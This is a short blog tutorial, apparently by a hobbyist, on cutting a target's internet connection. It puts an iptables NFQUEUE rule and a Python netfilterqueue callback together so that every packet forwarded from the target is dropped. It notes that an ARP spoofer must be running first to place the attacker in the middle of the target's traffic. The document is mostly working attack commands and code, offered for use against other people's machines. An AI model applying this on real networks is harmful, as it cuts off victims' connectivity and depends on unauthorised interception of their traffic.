Cut target Internet connection with Netfilterqueue

Hello friends, we are going to disable Internet in our target using python.
To do this we are going to receive packets from a target and store this packets in the queue. Whenever we get a request we put it in a queue, and a target will never get this. And then we can use python to modify packets and send a request to its destination. The same process can be done with response also.
To create queue we are going to use IPTABLES:
iptables -I FORWARD -j NFQUEUE --queue-num 0-I — a chain that we want to modify. Forward — place where packets placed by default.
-j — jump to chain with no return. Net Filter Queue.
— queue-num — queue which we are going to use. Can be any number.
Install netfilterqueue python:
pip install netfilterqueueImport netfilterqueue:
import netfilterqueueAnd create netfilterqueue object:
queue = netfilterqueue.NetfilterQueue()To bind method with queue we are going to use bind method.
QueueHandler.bind(queue_num, callback[, max_len[, mode[, range, [sock_len]]]])
Create and bind to the queue. queue_num must match the number in your iptables rule. callback is a function or method that takes one argument, a Packet object (see below). max_len sets the largest number of packets that can be in the queue; new packets are dropped if the size of the queue reaches this number. mode determines how much of the packet data is provided to your script. Use the constants above. range defines how many bytes of the packet you want to get. For example, if you only want the source and destination IPs of a IPv4 packet, range could be 20. sock_len sets the receive socket buffer size.
queue.bind(0, drop_packet)0 — queue number from iptables command.
drop_packet — function which we are going to create.
Run queue:
queue.run()Now we need to implement drop_packet function:
def drop_packet(packet):
packet.drop()All received packets from the target will be dropped, and a target will lose internet connection.
Once you did you need to clean iptables:
iptables --flushTo make this script work arp_spoofer need to be started first
Check my blog — devopslife.xyz